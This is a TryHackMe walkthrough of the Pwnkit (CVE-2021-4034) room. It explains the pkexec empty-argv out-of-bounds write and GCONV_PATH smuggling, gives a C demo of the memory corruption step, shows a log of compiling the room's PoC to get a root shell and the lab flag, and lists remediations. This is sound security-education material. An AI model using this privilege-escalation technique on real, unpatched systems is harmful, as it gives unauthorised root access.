Tryhackme - Pwnkit: (CVE-2021-4034)

In this walk through, we will be going through the Pwnkit: (CVE-2021-4034) room from Tryhackme. We will take a dive into an interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. So, let’s get started without any delay.

Task 1 – [Info] Introduction and Deploy

Task 2 – [Tutorial] Background

Question 1 – Is Pwnkit exploitable remotely (Aye/Nay)?

Answer: Nay. CVE-2021-4034 is a local privilege escalation; an attacker already needs code execution as an unprivileged user on the host.

Question 2 – In which Polkit utility does the Pwnkit vulnerability reside?

Answer: pkexec, the setuid-root helper Polkit ships for running a command as another user.

Task 3 – [Practical] Exploitation

Question 1 – Read through the cve-2021-4034-poc.c file and try to understand how it works. See if you can match this up with the Qualys security advisory and the explanation given in the previous task!

In short: pkexec is setuid root and, when started with an empty argument list (argc == 0), still reads argv[1], which at that point is really envp[0], and writes the result of g_find_program_in_path() back into it. The PoC uses that single out-of-bounds write to smuggle an environment variable such as GCONV_PATH back into the environment pkexec had otherwise sanitised, so the iconv charset conversion triggered on pkexec's error path loads an attacker-controlled shared object while running as root.
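To make that out-of-bounds write concrete, here is an added C example. It is not the room's cve-2021-4034-poc.c and not pkexec's or GLib's code: it reproduces the handful of pkexec lines the Qualys advisory points at (a simplified stand-in for g_find_program_in_path() included) and runs them against a constructed copy of the process start layout, where an empty argv means envp begins at argv + 1. The directory and file names ("GCONV_PATH=.", "pwnkit", the pwnkit-demo-<pid> working directory) and the HOME value are this example's own choices. It shows the corruption of envp[0] with argc == 0, the same call with the upstream argc check applied, and a normal argc == 2 call where the write stays inside argv.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Cut-down stand-in (this example's own, not GLib's) for g_find_program_in_path():
 * walk a PATH string and return a malloc'd "dir/name" for the first regular,
 * owner-executable file found, or NULL. */
static char *find_program_in_path(const char *name, const char *path_env)
{
    const char *dir = path_env;
    while (dir != NULL && *dir != '\0') {
        const char *end = strchr(dir, ':');
        size_t dlen = end ? (size_t)(end - dir) : strlen(dir);
        size_t need = dlen + 1 + strlen(name) + 1;
        struct stat st;
        char *cand = malloc(need);
        if (cand == NULL)
            return NULL;
        snprintf(cand, need, "%.*s/%s", (int)dlen, dir, name);
        if (stat(cand, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & S_IXUSR))
            return cand;
        free(cand);
        dir = end ? end + 1 : NULL;
    }
    return NULL;
}

/* The pkexec logic the advisory points at, reduced to its essence (the option
 * loop is omitted: it starts at n = 1 and with argc == 0 never runs, so n is
 * still 1 when argv[n] is read and later overwritten with the resolved path).
 * With patched != 0 the upstream fix is applied: an empty argv is rejected. */
static void pkexec_resolve_program(int argc, char **argv, const char *path_env, int patched)
{
    int n = 1;
    char *path, *s;

    if (patched && argc < 1)
        return;                         /* real pkexec exits with status 127 here */
    path = argv[n];                     /* argc == 0: this reads envp[0] */
    if (path == NULL || path[0] == '/')
        return;
    s = find_program_in_path(path, path_env);
    if (s != NULL)
        argv[n] = s;                    /* argc == 0: this writes envp[0] */
}

/* Constructed attacker layout (names chosen for this example) in a fresh
 * directory that this function also chdir()s into: a directory literally
 * named "GCONV_PATH=." holding an executable file named "pwnkit". */
static int make_fixture(void)
{
    char dir[64];
    int fd;

    snprintf(dir, sizeof dir, "pwnkit-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) {
        snprintf(dir, sizeof dir, "/tmp/pwnkit-demo-%ld", (long)getpid());
        if (mkdir(dir, 0700) != 0 && errno != EEXIST)
            return -1;                  /* neither cwd nor /tmp is writable */
    }
    if (chdir(dir) != 0 || (mkdir("GCONV_PATH=.", 0755) != 0 && errno != EEXIST))
        return -1;
    fd = open("GCONV_PATH=./pwnkit", O_WRONLY | O_CREAT, 0755);
    if (fd < 0)
        return -1;
    close(fd);
    return 0;
}

/* Constructed copy of the stack after execve("pkexec", {NULL}, {"pwnkit", NULL}):
 * argv[0] is already the NULL terminator, so envp == argv + 1 and argv[1]
 * aliases envp[0]. Returns envp[0] after pkexec's path fix-up ran. */
static const char *demo_empty_argv(int patched)
{
    char *vec[] = { NULL, "pwnkit", NULL };
    char **argv = vec, **envp = vec + 1;
    pkexec_resolve_program(0, argv, "GCONV_PATH=.", patched);
    return envp[0];
}

/* Same layout for a normal call, "pkexec pwnkit", with one environment
 * variable: argv[1] is resolved in place and envp[0] is left alone. */
static const char *demo_normal_argv(void)
{
    char *vec[] = { "pkexec", "pwnkit", NULL, "HOME=/home/tryhackme", NULL };
    char **argv = vec, **envp = vec + 3;
    pkexec_resolve_program(2, argv, "GCONV_PATH=.", 0);
    return envp[0];
}

int main(void)
{
    if (make_fixture() != 0) {
        perror("make_fixture");
        return 1;
    }
    printf("argc==0, vulnerable: envp[0] = \"%s\"\n", demo_empty_argv(0));
    printf("argc==0, patched:    envp[0] = \"%s\"\n", demo_empty_argv(1));
    printf("argc==2, vulnerable: envp[0] = \"%s\"\n", demo_normal_argv());
    return 0;
}
```

Run it from a writable directory; the vulnerable argc == 0 case turns envp[0] from "pwnkit" into "GCONV_PATH=./pwnkit", which is exactly how the PoC gets a GCONV_PATH variable past pkexec's environment sanitisation. Only the memory-corruption step is reproduced here; the real PoC goes on to place a gconv-modules file and a shared object under that directory and to trigger the error path that loads it.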

Question 2 – Exploit the vulnerability! What is the flag located at /root/flag.txt?

wh1terose@fsociety:~/CTF/TryHackme/Pwnkit/CVE-2021-4034$ ssh tryhackme@10.10.189.29
The authenticity of host '10.10.189.29 (10.10.189.29)' can't be established.
ECDSA key fingerprint is SHA256:IYBKs2H1eA35XEWnIyT3iwiKTGpNRauPL0MbeTiUCVg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.189.29' (ECDSA) to the list of known hosts.
tryhackme@10.10.189.29's password: 

		 ____                 _    _ _   
		|  _ \__      ___ __ | | _(_) |_ 
		| |_) \ \ /\ / / '_ \| |/ / | __|
		|  __/ \ V  V /| | | |   <| | |_ 
		|_|     \_/\_/ |_| |_|_|\_\_|\__|
						 

tryhackme@pwnkit:~$ ls
pwnkit
tryhackme@pwnkit:~$ cd pwnkit/
tryhackme@pwnkit:~/pwnkit$ ls
README.md  cve-2021-4034-poc.c
tryhackme@pwnkit:~/pwnkit$ gcc cve-2021-4034-poc.c -o exploit
tryhackme@pwnkit:~/pwnkit$ ./exploit 
# id  
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
# cat /root/flag.txt
THM{CONGRATULATIONS-YOU-EXPLOITED-PWNKIT}

Question 3 – [Bonus Question — Optional] Using the Qualys advisory and the repository linked in the task, try to write your own version of the Pwnkit exploit.

Task 4 – [Tutorial] Remediations

Question 1 – Read the remediations task

Question 2 – Patch the vulnerability on any Linux devices that you manage!

Update the Polkit package (policykit-1 on Debian and Ubuntu, polkit on RHEL and Fedora) to a build that carries the CVE-2021-4034 fix. Where no patched package is available yet, the interim mitigation from the Qualys advisory is to remove the setuid bit from pkexec (chmod 0755 /usr/bin/pkexec), which disables pkexec until it can be patched.

Task 5 – [Info] Conclusion

So that was Pwnkit: (CVE-2021-4034) for you. We looked into the background of the Polkit vulnerability and then moved on to its exploitation and remediation. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
